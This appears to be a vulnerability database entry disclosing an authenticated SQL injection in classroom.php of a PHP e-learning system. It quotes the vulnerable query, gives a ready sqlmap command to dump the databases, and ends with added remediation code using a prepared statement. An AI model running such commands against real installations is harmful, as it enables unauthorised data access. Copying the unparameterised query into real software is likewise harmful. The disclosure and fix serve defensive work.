Title | SQL injection in Simple E-Learning System (authenticated) |
---|
Description | Source code of the E-Learning System: https://www.sourcecodester.com/php-simple-e-learning-system-source-code
In classroom.php, line 42, the code is as follows:
if (isset($_GET['post_id'])) {
$post_id = $_GET['post_id'];
$data_query = mysqli_query($con, "SELECT body FROM posts WHERE id='$post_id'");
$body = mysqli_fetch_array($data_query);
The post_id parameter is spliced directly into the SQL query statement, and $body is echoed directly at line 156,
so there is an obvious SQL injection; it only requires an authenticated user. We can use sqlmap to exploit it. The command is below, with the cookie set to that of your own user:
python .\sqlmap.py -u "http://127.0.0.1/vcs/classRoom.php?post_id=1&classCode=class101_a" --cookie="PHPSESSID=12blsndrn1t8gcphdj864gbrcu" --dbs |
---|
Source | ⚠️ https://www.sourcecodester.com/php-simple-e-learning-system-source-code |
---|
User | wuerror (ID 30660) |
---|
Submission | 05.08.2022 05:01 (2 years ago) |
---|
Moderation | 05.08.2022 07:13 (2 hours later) |
---|
Status | Accepted |
---|
VulDB Entry | 205615 |
---|
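
The query in classroom.php quoted in the description, rewritten with input validation and a bound parameter. This is an added example, not code from the project or the submitter; the helper name `fetch_post_body` is hypothetical, and it assumes `$con` is the open mysqli connection used on the page and that `posts.id` is an integer column.

```php
<?php
// Added example, not the project's code. Assumes $con is the open mysqli
// connection from classroom.php and that posts.id is an integer column.

/**
 * Hypothetical helper: returns the post body for a request-supplied id,
 * or null when the id is invalid, the row is missing, or the query fails.
 */
function fetch_post_body(mysqli $con, $rawPostId): ?string
{
    // Reject anything that is not a positive integer (arrays included)
    // before the value gets anywhere near the database.
    $postId = filter_var($rawPostId, FILTER_VALIDATE_INT,
                         ['options' => ['min_range' => 1]]);
    if ($postId === false) {
        return null;
    }

    // The statement text is fixed; the id travels as a bound parameter,
    // so quotes in the input cannot change the structure of the query.
    $stmt = $con->prepare('SELECT body FROM posts WHERE id = ?');
    if ($stmt === false) {
        error_log('prepare failed: ' . $con->error);
        return null;
    }
    $stmt->bind_param('i', $postId);
    if (!$stmt->execute()) {
        error_log('execute failed: ' . $stmt->error);
        $stmt->close();
        return null;
    }
    $stmt->bind_result($body);
    $found = $stmt->fetch();   // true = row, null = no row, false = error
    $stmt->close();

    return $found === true ? $body : null;
}

// Replacement for the block at line 42. Note that $body is now the body
// string itself (or null), not the row array from mysqli_fetch_array().
$body = null;
if (isset($_GET['post_id'])) {
    $body = fetch_post_body($con, $_GET['post_id']);
    if ($body === null) {
        http_response_code(404);
    }
}
```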